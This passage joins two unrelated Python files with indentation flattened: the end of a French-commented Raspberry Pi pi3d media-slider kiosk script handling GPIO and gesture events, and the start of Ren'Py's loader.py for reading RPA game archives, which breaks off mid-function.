if "4" in Scenario["Evenements"]["GPIO_DOWN"]:
GPIO.add_event_detect(4, GPIO.FALLING, callback=GPIO_DOWN) # FALLING or RISING
# ********** Slider timeout
slider_timeout = SLIDER_TIMEOUT
def SliderTimeout():
global slider_timeout, Medias, current_media
slider_timeout=SLIDER_TIMEOUT
#TraiteEvenement('Slider_Timeout')
# slider_visible=False
# Lance(Medias[current_media].action)
# Telecommande
class Telecommande(Thread):
def run(self):
telecommande_read()
Telecommande().start()
# Skywriter
try:
@skywriter.flick()
def flick(start,finish):
if start+"-"+finish in Scenario["Evenements"]["PAD"]:
TraiteEvenement(Scenario["Evenements"]["PAD"][start+"-"+finish])
# if Debug: print('Got a flick!', start, finish)
"""
@skywriter.airwheel()
def airwheel(delta):
if delta>0:
TraiteEvenement(Scenario["Evenements"]["PAD"]["airwheel-horaire"])
time.sleep(1)
delta=0
if delta<0:
TraiteEvenement(Scenario["Evenements"]["PAD"]["airwheel-antihoraire"])
time.sleep(1)
delta=0
print('Airwheel',delta)
"""
@skywriter.move()
def move(xp, yp, zp):
global PAD_z
PAD_z=zp
pass
except:
pass
# ********** Paramètres d'affichage du slider - gestionaire de transparence dans le fenetrage
subprocess.Popen('xcompmgr', shell=False)
BACKGROUND = (0, 0, 0, 0)
#DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=10, display_config=pi3d.DISPLAY_CONFIG_FULLSCREEN)
DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, w=400, h=400, use_glx=True, window_title=PI3D_window_name)
# DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, w=100, h=100, use_glx=True)
# DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, display_config=pi3d.DISPLAY_CONFIG_FULLSCREEN, use_glx=True, layer=2, window_title=PI3D_window_name)
SHADER = pi3d.Shader("uv_flat")
Blur=True
Blur=False
Fog=True
if Blur:
defocus = pi3d.Defocus()
mykeys = pi3d.Keyboard()
action = ''
#taille=10
distance_mediax = 20 # distance horizontale entre les images
distance_mediay = 10 # distance verticale entre les images en cours et les prochaines images
distance_mediaz = 20 # distance verticale entre l'image sélectionnée et les autres images
recul=40 # recul de la caméra
#recul=80
distance=20 # coefficient général pour l'affichage des catégories
distance_caty=0.7
distance_catz=0.08
nb_step_cat=10 # nombre de steps pour passer d'une catégorie à une autre
nb_step_souscat=10 # nombre de steps pour passer d'une sous catégorie à une autre
nb_step_media=10 # nombre de steps pour paser d'un média à un autre - déplacement horizontal
nb_step_groupe_media=10 # nombre de steps pour paser d'un groupe de médias à un autre - déplacement vertical
PlaylistNext=True # détermine si la playlist doit passer au média suivant ou s'arrêter
CAMERA=pi3d.Camera.instance()
CAMERA.position((0,0,-recul))
"""
hand = pi3d.Model(file_string='hand.obj', name='hand') # image de la main
hand.set_shader(SHADER)
sprite = pi3d.ImageSprite("PAD.png", SHADER, w=10.0, h=6.0) # image de la tablette
"""
# ********** Initialisation des formes géométriques Fleche et Cadre
# Initialisation de la fleche
lfleche = 0.10 # largeur de la fleche
hfleche = 0.125 # hauteur de la fleche
fleche = pi3d.Lines(vertices=[[0, hfleche/4, 0],[2*lfleche/3, hfleche/4 , 0],[2*lfleche/3, hfleche/2, 0],[lfleche,0,0],[2*lfleche/3, -hfleche/2, 0],[2*lfleche/3, -hfleche/4, 0],[0, -hfleche/4, 0],[0, hfleche/4, 0]],x=0, y=0, z=0, material=(1.0,0.8,0.05),line_width=4)
fleche.position(0.27,0,-39)
fleche.shader = pi3d.Shader("mat_flat")
# Initialisation du cadre pour la catégorie en cours
lcadre = 0.5
hcadre = 0.125
cadre = pi3d.Lines(vertices=[[-lcadre/2, -hcadre/2, 0],[-lcadre/2, hcadre/2 , 0],[lcadre/2, hcadre/2, 0],[lcadre/2,-hcadre/2,0],[-lcadre/2, -hcadre/2, 0]],x=0, y=0, z=0, material=(1.0,0.8,0.05),line_width=4)
cadre.position(0,0,-39)
cadre.shader = pi3d.Shader("mat_flat")
# ********** Fonctions pour la gestion des medias, des categories et des sous categories
class CMedia:
def __init__(self, chemin_image, chemin_vignette, desc, action, cats_souscats):
# par exemple, cats_souscats = "Chaussures Hommes|Hiver;Chaussures Hommes|Sport"
cats = []
souscats = []
elts = cats_souscats.split(";")
for elt in elts:
cats.append(elt.split("|")[0])
souscats.append(elt.split("|")[1])
self.cats = cats
self.souscats = souscats
self.desc = desc
self.action = action
self.media = pi3d.ImageSprite(chemin_image, shader=SHADER, w=13, h=9.3, x=0, y=0, z=0)
self.mediadesc = pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=desc, x=0, y=0, z=0)
self.mediadesc.set_shader(SHADER)
#self.vignette = pi3d.ImageSprite(chemin_vignette, shader=SHADER, w=13, h=9.3, x=0, y=0, z=0)
def filtrerParCategorie(nom_cat):
if Debug: print("filtrerParCategorie : ",nom_cat)
res = []
for cm in AllMedias:
if nom_cat in cm.cats:
res.append(cm)
return res
def filtrerParSousCategorie(nom_cat, nom_souscat):
if Debug: print("filtrerParSousCategorie : ",nom_cat," : ",nom_souscat)
res = []
for cm in AllMedias:
i = 0
trouve = False
while (i < len(cm.cats)) and (trouve == False):
if (nom_cat == cm.cats[i]) and (nom_souscat == cm.souscats[i]):
trouve = True
res.append(cm)
else:
i =i+1
return res
# Chargement de la totalité des médias à partir du fichier media.ini
f = open(RepertoireMediaIni, "r")
for l in f:
# si la ligne n'est pas vide et son première caractère est différent de [ et de #, alors traiter la ligne
if (len(l) > 0) and (l[0]!='[') and (l[0]!='#'):
if (l[-1]=='\n'):
l = l[0:len(l)-1]
t = l.split(';')
catssouscats = ""
i = 4
while i < len(t):
if i == 4:
catssouscats = t[i]
else:
catssouscats = catssouscats + ";" + t[i]
cat = t[i].split("|")[0]
souscat = t[i].split("|")[1]
if not(cat in categories):
categories.append(cat)
sous_categories.append([])
x = categories.index(cat)
if not(souscat in sous_categories[x]):
sous_categories[x].append(souscat)
i = i+1
AllMedias.append(CMedia(t[0],t[1],t[2], t[3], catssouscats))
if Debug: print(categories)
if Debug: print(sous_categories)
# ********** Fonctions de transition pour les medias vers le haut ou vers le bas
def transitionMediaBas(etape, maxetape):
i=0
for Media in Medias:
x=(i-current_media)*distance_mediax
y=-(etape/maxetape)*distance_mediay
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
i=0
for Media in NextMedias:
x=(i-next_current_media)*distance_mediax
y=distance_mediay*(1-etape/maxetape)
if i == next_current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
def transitionMediaHaut(etape, maxetape):
i=0
for Media in Medias:
x=(i-current_media)*distance_mediax
y=distance_mediay*(etape/maxetape)
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
i=0
for Media in NextMedias:
x=(i-next_current_media)*distance_mediax
y=distance_mediay*(etape/maxetape - 1)
if i == next_current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
# ********** Actions du slider
def SliderDump():
if Debug: print("Début Slider dump")
if Debug: print('slider_visible = ',slider_visible)
if Debug: print('slider_mode = ',slider_mode)
if Debug: print('current_media = ',current_media)
if Debug: print('next_current_media = ',next_current_media)
if Debug: print('current_cat = ',current_cat)
if Debug: print('current_souscat = ',current_souscat)
if Debug: print('len(Medias) = ',len(Medias))
if Debug: print('Scenario["Associations"]["Slider_Timeout"] = ',Scenario["Associations"]["Slider_Timeout"])
if Debug: print("Fin Slider dump")
def SliderInitialiserAffichage():
global current_cat, current_souscat, cats, cats2, souscats2, Medias
current_cat=0 # indice de la première catégorie à afficher
current_souscat=-1 # indice de la sous-catégorie à afficher, -1 pour afficher toutes les sous-catégories
#Initialiser les catégories et les sous catégories
cats=[]
cats2=[]
souscats2=[]
i=0
for categorie in categories:
x=0
y=(i-current_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat)*distance_catz))
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=categorie, x=x, y=y, z=z)
a.set_shader(SHADER)
cats.append(a)
cats2.append(a)
res=[]
for souscategorie in sous_categories[i]:
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=souscategorie, x=0, y=0, z=0)
a.set_shader(SHADER)
res.append(a)
souscats2.append(res)
i=i+1
# Initialiser Medias
if current_souscat == -1:
Medias = filtrerParCategorie(categories[current_cat])
else:
Medias = filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][current_souscat])
def SliderAfficherSelection():
global current_media, slider_mode
slider_mode='selection'
# Positionner les médias
nb_images = len(Medias)
if nb_images > 1:
current_media=1 # on prend le deuxième média de la liste
else:
current_media=0 # on prend le média unique de la liste
i=0
for Media in Medias:
x=(i-1)*distance_mediax
y=0
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
def SliderDroiteSelection():
global move_steps_media, slider_action
if current_media < len(Medias)-1:
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_media=1
slider_action = 'DroiteSelection'
def SliderGaucheSelection():
global move_steps_media, slider_action
if current_media > 0:
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_media=1
slider_action = 'GaucheSelection'
def SliderAfficherCategories():
global slider_mode, slider_action, NextMedias, move_steps, next_current_media
if slider_mode!='categorie':
if slider_mode=='souscategorie':
slider_mode='categorie'
cat = cats[current_cat]
cat.position(0,0,-distance*1.8)
NextMedias=filtrerParCategorie(categories[current_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps=0
slider_action="AfficherCategoriesAvecChangementMedia"
else:
slider_mode='categorie'
cat = cats[current_cat]
cat.position(0,0,-distance*1.8)
def SliderHautCategories():
global slider_mode, slider_action, move_steps_cat, current_cat, next_cat, next_current_media, categories, NextMedias
if (slider_mode=='categorie') and (current_cat < len(categories)-1):
next_cat = current_cat+1
NextMedias=filtrerParCategorie(categories[next_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_cat=0
slider_action = "HautCategories"
def SliderBasCategories():
global slider_mode, slider_action, move_steps_cat, current_cat, next_cat, next_current_media, categories, NextMedias
if (slider_mode=='categorie') and (current_cat > 0):
next_cat = current_cat-1
NextMedias=filtrerParCategorie(categories[next_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_cat=0
slider_action = 'BasCategories'
def SliderAfficherSousCategories():
global slider_action, slider_mode, move_steps, current_cat, current_souscat, souscats, next_current_media, NextMedias
if len(sous_categories[current_cat]) > 1:
slider_mode='souscategorie'
current_souscat = 1
#Initialiser les sous catégories
souscats=[]
i=0
for souscategorie in sous_categories[current_cat]:
x=0
y=(i-current_souscat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat)*distance_catz))
#z=-distance*1.8
if Debug: print('pi3d.String : ',souscategorie)
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=souscategorie, x=x, y=y, z=z)
a.set_shader(SHADER)
souscats.append(a)
i=i+1
NextMedias = filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][current_souscat])
if Debug: print('dans SliderAfficherSousCategories(), len(NextMedias) = ',len(NextMedias))
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps=0
slider_action='AfficherSousCategories'
def SliderHautSousCategories():
global slider_action, move_steps_souscat, next_souscat, NextMedias, next_current_media
if (slider_mode=='souscategorie') and (current_souscat < len(sous_categories[current_cat])-1):
next_souscat = current_souscat+1
NextMedias=filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][next_souscat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_souscat=0
slider_action='HautSousCategories'
def SliderBasSousCategories():
global slider_action, move_steps_souscat, next_souscat, NextMedias, next_current_media
if (slider_mode=='souscategorie') and (current_souscat > 0):
next_souscat = current_souscat-1
NextMedias=filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][next_souscat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important : l'instruction slider_action= doit être la dernière car c'est elle qui déclenche la transition visuelle
move_steps_souscat=0
slider_action='BasSousCategories'
#Initialisation Slider
SliderInitialiserAffichage()
SliderAfficherSelection()
print("******************")
print("****** Prêt ******")
print("******************")
# DISPLAY.destroy()
# while False:
# boucle de gestion affichage 3D tant que pas detruit
while DISPLAY.loop_running():
# ********** Lance la commande Start si elle existe
if "Start" in Scenario["Associations"]:
for actionid in Scenario["Associations"]["Start"]:
Lance(actionid)
Scenario["Associations"].pop("Start", None)
if PAD_z < PAD_seuil_detection:
PAD_Timeout=-1
if (PAD_z < PAD_seuil_detection) and (not PAD_Actif):
PAD_Actif=True
PAD_Transition=-PAD_Transition_duree
TraiteEvenement("PAD_Actif")
if (PAD_z >= PAD_seuil_detection) and (PAD_Actif):
if PAD_Timeout==-1:
PAD_Timeout=round(time.time()*100)
if Debug: print(PAD_Timeout)
else:
if Debug: print(round(time.time()*100) - PAD_Timeout - PAD_Timeout_Delay)
if (round(time.time()*100) - PAD_Timeout - PAD_Timeout_Delay) > 0:
PAD_Timeout=-1
PAD_Actif=False
PAD_Transition=PAD_Transition_duree
TraiteEvenement("PAD_Inactif")
# Lance("SliderActionSelection")
if Debug: print("PAD Inactif")
if slider_visible or PAD_Transition>0:
# PAD_Transition=-PAD_Transition_duree # activation de -PAD_Transition_duree à 0, désactivation de +PAD_Transition_duree à 0
if PAD_Transition<0: PAD_Transition=PAD_Transition+1
if PAD_Transition>0: PAD_Transition=PAD_Transition-1
CAMERA.reset()
if slider_visible:
CAMERA.position((0,0,-recul + (PAD_Transition / PAD_Transition_duree)*60))
if not slider_visible:
CAMERA.position((0,0,-recul - ((PAD_Transition_duree - PAD_Transition) / PAD_Transition_duree)*60))
############################ Slider ##############################
# Prise en compte des déplacements
if slider_action=='DroiteSelection':
if move_steps_media <= nb_step_media:
i=0
while (i < len(Medias)):
if (i > current_media -3) and (i < current_media + 3):
Media = Medias[i]
x=(i-current_media-move_steps_media/nb_step_media)*distance_mediax
y, z = 0, 0
if i == (current_media+1):
z=-(move_steps_media/nb_step_media)*distance_mediaz
elif i == current_media:
z=-(1-move_steps_media/nb_step_media)*distance_mediaz
Media.media.position(x,y,z)
i=i+1
if move_steps_media == nb_step_media:
slider_action = ''
current_media = current_media + 1
else:
move_steps_media=move_steps_media+1
if slider_action == 'GaucheSelection':
if move_steps_media <= nb_step_media:
i=0
while (i < len(Medias)):
if (i > current_media -3) and (i < current_media + 3):
Media = Medias[i]
x=(i-current_media+move_steps_media/nb_step_media)*distance_mediax
y, z = 0, 0
if i == (current_media-1):
z=-(move_steps_media/nb_step_media)*distance_mediaz
elif i == current_media:
z=-(1-move_steps_media/nb_step_media)*distance_mediaz
Media.media.position(x,y,z)
i=i+1
if move_steps_media == nb_step_media:
slider_action = ''
current_media = current_media - 1
else:
move_steps_media=move_steps_media+1
if slider_action == 'AfficherCategoriesAvecChangementMedia':
transitionMediaHaut(move_steps, nb_max_steps)
if move_steps < nb_max_steps:
move_steps=move_steps+1
else:
if Debug: print('AfficherCategoriesAvecChangementMedia')
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action == 'HautCategories':
if move_steps_cat <= nb_step_cat:
i=0
for cat in cats:
y=(i-current_cat-move_steps_cat/nb_step_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat-move_steps_cat/nb_step_cat)*distance_catz))
cat.position(0,y,z)
i=i+1
transitionMediaBas(move_steps_cat, nb_step_cat)
if move_steps_cat < nb_step_cat:
move_steps_cat=move_steps_cat+1
else:
current_cat = next_cat
current_souscat = -1
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action == 'BasCategories':
if move_steps_cat <= nb_step_cat:
i=0
for cat in cats:
y=(i-current_cat+move_steps_cat/nb_step_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat+move_steps_cat/nb_step_cat)*distance_catz))
cat.position(0,y,z)
i=i+1
#print("transitionMediaHaut")
transitionMediaHaut(move_steps_cat, nb_step_cat)
if move_steps_cat < nb_step_cat:
move_steps_cat=move_steps_cat+1
else:
current_cat = next_cat
current_souscat = -1
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action=='AfficherSousCategories':
# Afficher la transition des médias
transitionMediaBas(move_steps, nb_step_groupe_media)
# Afficher la transition à gauche de la catégorie
cat = cats[current_cat]
x=-2*move_steps/nb_step_groupe_media
y=move_steps/nb_step_groupe_media
z=-distance*1.8
cat.position(x,y,z)
if move_steps < nb_step_groupe_media:
move_steps=move_steps+1
else:
current_media = next_current_media
Medias = NextMedias
NextMedias = []
if Debug: print('dans le bloc if slider_action=="AfficherSousCategories", len(Medias) = ',len(Medias))
slider_action = ''
if slider_action=='HautSousCategories':
if move_steps_souscat <= nb_step_souscat:
i=0
for souscat in souscats:
y=(i-current_souscat-move_steps_souscat/nb_step_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat-move_steps_souscat/nb_step_souscat)*distance_catz))
souscat.position(0,y,z)
i=i+1
#print("transitionMediaBas")
transitionMediaBas(move_steps_souscat, nb_step_souscat)
if move_steps_souscat < nb_step_souscat:
move_steps_souscat=move_steps_souscat+1
else:
current_souscat = next_souscat
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
if slider_action=='BasSousCategories':
if move_steps_souscat <= nb_step_souscat:
i=0
for souscat in souscats:
y=(i-current_souscat+move_steps_souscat/nb_step_souscat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat+move_steps_souscat/nb_step_souscat)*distance_catz))
souscat.position(0,y,z)
i=i+1
#print("transitionMediaHaut")
transitionMediaHaut(move_steps_souscat, nb_step_souscat)
if move_steps_souscat < nb_step_souscat:
move_steps_souscat=move_steps_souscat+1
else:
current_souscat = next_souscat
current_media = next_current_media
Medias = NextMedias
NextMedias = []
slider_action = ''
######################################################################
# Affichage des objets
# Affichage de la fleche et du cadre si slider_mode = catégorie
if (slider_mode == 'categorie') and (action == ''):
fleche.draw()
if slider_mode=='categorie':
cadre.draw()
for cat in cats:
cat.draw()
if slider_mode=='souscategorie':
cadre.draw()
cat=cats[current_cat]
cat.draw()
for souscat in souscats:
souscat.draw()
if slider_action=='':
fleche.draw()
if slider_mode == 'categorie' and Blur:
defocus.start_blur()
# Afficher 2 médias avant et 2 médias après le media courant
i=0
while (i < len(Medias)):
if (i > current_media -2) and (i < current_media + 2):
Media = Medias[i]
Media.media.draw()
i=i+1
# idem pour Next Medias
i=0
while (i < len(NextMedias)):
if (i > next_current_media -2) and (i < next_current_media + 2):
Media = NextMedias[i]
Media.media.draw()
i=i+1
# Afficher le texte du média courant
if (slider_mode=='selection') and (slider_action==''):
Media = Medias[current_media]
Media.mediadesc.position(0,0,-distance*1.8)
Media.mediadesc.draw()
# Afficher la catégorie et la sous catégorie en haut à gauche
if (slider_mode=='selection') and (len(cats2) > 0):
cats2[current_cat].position(-2,1,-distance*1.8)
cats2[current_cat].draw()
if current_souscat != -1:
souscats2[current_cat][current_souscat].position(-2,0.5,-distance*1.8)
souscats2[current_cat][current_souscat].draw()
if Fog:
if move_steps_cat==2:
if Debug: print("Fog")
if (slider_mode == 'categorie') or (slider_mode == 'souscategorie'):
for i in range(len(Medias)):
if i==current_media:
Medias[i].media.set_fog((0,0,0,0.9),30.0)
else:
Medias[i].media.set_fog((0,0,0,0.92),40.9)
for i in range(len(NextMedias)):
if i==next_current_media:
NextMedias[i].media.set_fog((0,0,0,0.9),30.0)
else:
NextMedias[i].media.set_fog((0,0,0,0.92),40.9)
#if current_media > 1:
#Medias[current_media-2].media.set_fog((0,0,0,0.92),40.9)
#if current_media > 0:
#Medias[current_media-1].media.set_fog((0,0,0,0.92),40.9)
#Medias[current_media].media.set_fog((0,0,0,0.9),30.0)
#if current_media < nb_images-1:
#Medias[current_media+1].media.set_fog((0,0,0,0.92),40.9)
#if current_media < nb_images-2:
#Medias[current_media+2].media.set_fog((0,0,0,0.92),40.9)
else:
for Media in Medias:
Media.media.set_fog((0,0,0,1),100)
for Media in NextMedias:
Media.media.set_fog((0,0,0,1),100)
if Blur:
if move_steps_cat==2:
if Debug: print("Blur")
if slider_mode == 'categorie':
defocus.end_blur()
for Media in Medias:
defocus.blur(Media.media, -distance/2, distance, 2) # if 4,9,5 : 4 is focal distance, >= 9 distance will get 5 x blurring, nearer than focus also blurs
for Media in NextMedias:
defocus.blur(Media.media, -distance/2, distance, 2) # if 4,9,5 : 4 is focal distance, >= 9 distance will get 5 x blurring, nearer than focus also blurs
fleche.position(0,0,-39)
fleche.draw()
# Slider timeout
slider_timeout = slider_timeout-1
if (slider_timeout % 10) == 0:
if Debug: print('slider_timeout = ',slider_timeout)
if slider_timeout <= 0: SliderTimeout()
"""
hand.rotateToY(110)
#hand.rotateIncY(3)
hand.rotateToX(-80)
#hand.rotateIncX(3)
hand.rotateToZ(10)
#hand.rotateIncZ(1)
hand.position(10,-7+move_steps/6,-19)
#hand.position(0,-1,-32)
#hand.position(10,-6+move_steps/2,40)
hand.draw()
#sprite.rotateToX(20)
sprite.position(14,-7.5,-10)
sprite.draw()
"""
# action qui detruit le pi3D dans le scenario
if slider_stop==True:
#mykeys.close()
DISPLAY.destroy()
break
# Timeline
if PlayedMediaId :
try:
position=int(round(Player.position()*10))
for event_time in MediaTimeline:
if position==int(event_time):
for actionid in MediaTimeline[event_time]:
Lance(actionid)
MediaTimeline.pop(event_time, None)
except:
pass
GPIO.cleanup()
if RS232_ok:
RS232.close()
if RS232_2_ok:
RS232_2.close()
print("******************")
print("***** Terminé ****")
print("******************")
|
loader.py
|
# Copyright 2004-2014 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import renpy
import os.path
from pickle import loads
from cStringIO import StringIO
import sys
import types
import threading
# Ensure the utf-8 codec is loaded, to prevent recursion when we use it
# to look up filenames.
u"".encode("utf-8")
################################################################## Asset Loading
try:
import android.apk
expansion = os.environ.get("ANDROID_EXPANSION", None)
if expansion is not None:
print "Using expansion file", expansion
apks = [
android.apk.APK(apk=expansion, prefix='assets/x-game/'),
android.apk.APK(apk=expansion, prefix='assets/x-renpy/x-common/'),
]
game_apks = [ apks[0] ]
else:
print "Not using expansion file."
apks = [
android.apk.APK(prefix='assets/x-game/'),
android.apk.APK(prefix='assets/x-renpy/x-common/'),
]
game_apks = [ apks[0] ]
except ImportError:
apks = [ ]
game_apks = [ ]
# Files on disk should be checked before archives. Otherwise, among
# other things, using a new version of bytecode.rpyb will break.
archives = [ ]
# The value of renpy.config.archives the last time index_archives was
# run.
old_config_archives = None
# A map from lower-case filename to regular-case filename.
lower_map = { }
def index_archives():
"""
Loads in the indexes for the archive files. Also updates the lower_map.
"""
# Update lower_map.
lower_map.clear()
for dir, fn in listdirfiles(): #@ReservedAssignment
lower_map[fn.lower()] = fn
# Index the archives.
global old_config_archives
if old_config_archives == renpy.config.archives:
return
old_config_archives = renpy.config.archives[:]
global archives
archives = [ ]
for prefix in renpy.config.archives:
try:
fn = transfn(prefix + ".rpa")
f = file(fn, "rb")
l = f.readline()
# 3.0 Branch.
if l.startswith("RPA-3.0 "):
offset = int(l[8:24], 16)
key = int(l[25:33], 16)
f.seek(offset)
index = loads(f.read().decode("zlib"))
# Deobfuscate the index.
for k in index.keys():
if len(index[k][0]) == 2:
index[k] = [ (offset ^ key, dlen ^ key) for offset, dlen in index[k] ]
else:
index[k] = [ (offset ^ key, dlen ^ key, start) for offset, dlen, start in index[k] ]
archives.append((prefix, index))
f.close()
continue
# 2.0 Branch.
if l.startswith("RPA-2.0 "):
offset = int(l[8:], 16)
f.seek(offset)
index = loads(f.read().decode("zlib"))
archives.append((prefix, index))
f.close()
continue
# 1.0 Branch.
f.close()
fn = transfn(prefix + ".rpi")
index = loads(file(fn, "rb").read().decode("zlib"))
archives.append((prefix, index))
except:
raise
def walkdir(dir): #@ReservedAssignment
rv = [ ]
if not os.path.exists(dir) and not renpy.config.developer:
return rv
for i in os.listdir(dir):
if i[0] == ".":
continue
if os.path.isdir(dir + "/" + i):
for fn in walkdir(dir + "/" + i):
rv.append(i + "/" + fn)
else:
rv.append(i)
return rv
def listdirfiles(common=True):
"""
Returns a list of directory, file tuples known to the system. If
the file is in an archive, the directory is None.
"""
rv = [ ]
seen = set()
if common:
list_apks = apks
else:
list_apks = game_apks
for apk in list_apks:
for f in apk.list():
# Strip off the "x-" in front of each filename, which is there
# to ensure that aapt actually includes every file.
f = "/".join(i[2:] for i in f.split("/"))
if f not in seen:
rv.append((None, f))
seen.add(f)
for i in renpy.config.searchpath:
if (not common) and (renpy.config.commondir) and (i == renpy.config.commondir):
continue
i = os.path.join(renpy.config.basedir, i)
for j in walkdir(i):
if j not in seen:
rv.append((i, j))
seen.add(j)
for _prefix, index in archives:
for j in index.iterkeys():
if j not in seen:
rv.append((None, j))
seen.add(j)
return rv
class SubFile(object):
def __init__(self, f, base, length, start):
self.f = f
self.base = base
self.offset = 0
self.length = length
self.start = start
if start is None:
self.name = self.f.name
else:
self.name = None
self.f.seek(self.base)
def __enter__(self):
return self
def __exit__(self, _type, value, tb):
self.close()
return False
def read(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
rv1 = self.start[self.offset:self.offset + length]
length -= len(rv1)
self.offset += len(rv1)
if length:
rv2 = self.f.read(length)
self.offset += len(rv2)
else:
rv2 = ""
return (rv1 + rv2)
def readline(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
# If we're in the start, then read the line ourselves.
if self.offset < len(self.start):
rv = ''
while length:
c = self.read(1)
rv += c
if c == '\n':
break
length -= 1
return rv
# Otherwise, let the system read the line all at once.
rv = self.f.readline(length)
self.offset += len(rv)
return rv
def readlines(self, length=None):
rv = [ ]
while True:
l = self.readline(length)
if not l:
break
if length is not None:
length -= len(l)
if l < 0:
break
rv.append(l)
return rv
def xreadlines(self):
return self
def __iter__(self):
return self
def next(self): #@ReservedAssignment
rv = self.readline()
if not rv:
raise StopIteration()
return rv
def flush(self):
return
def seek(self, offset, whence=0):
if whence == 0:
offset = offset
elif whence == 1:
offset = self.offset + offset
elif whence == 2:
offset = self.length + offset
if offset > self.length:
offset = self.length
self.offset = offset
offset = offset - len(self.start)
if offset < 0:
offset = 0
self.f.seek(offset + self.base)
def tell(self):
return self.offset
def close(self):
self.f.close()
def write(self, s):
raise Exception("Write not supported by SubFile")
def load_core(name):
"""
Returns an open python file object of the given type.
"""
name = lower_map.get(name.lower(), name)
if renpy.config.file_open_callback:
rv = renpy.config.file_open_callback(name)
if rv is not None:
return rv
# Look for the file in the apk.
for apk in apks:
prefixed_name = "/".join("x-" + i for i in name.split("/"))
try:
return apk.open(prefixed_name)
except IOError:
pass
# Look for the file directly.
if not renpy.config.force_archives:
try:
fn = transfn(name)
return file(fn, "rb")
except:
pass
# Look for it in archive files.
for prefix, index in archives:
if not name in index:
continue
f = file(transfn(prefix + ".rpa"), "rb")
data = [ ]
# Direct path.
if len(index[name]) == 1:
t = index[name][0]
if len(t) == 2:
offset, dlen = t
start = ''
else:
offset, dlen, start = t
rv = SubFile(f, offset, dlen, start)
# Compatibility path.
else:
for offset, dlen in index[name]:
f.seek(offset)
data.append(f.read(dlen))
rv = StringIO(''.join(data))
f.close()
return rv
return None
def get_prefixes():
"""
Returns a list of prefixes to search for files.
"""
rv = [ ]
language = renpy.game.preferences.language
if language is not None:
rv.append(renpy.config.tl_directory + "/" + language + "/")
rv.append("")
return rv
def load(name):
if renpy.config.reject_backslash and "\\" in name:
raise Exception("Backslash in filename, use '/' instead: %r" % name)
for p in get_prefixes():
rv = load_core(p + name)
if rv is not None:
return rv
raise IOError("Couldn't find file '%s'." % name)
loadable_cache = { }
def loadable_core(name):
"""
Returns True if the name is loadable with load, False if it is not.
"""
name = lower_map.get(name.lower(), name)
if name in loadable_cache:
return loadable_cache[name]
for apk in apks:
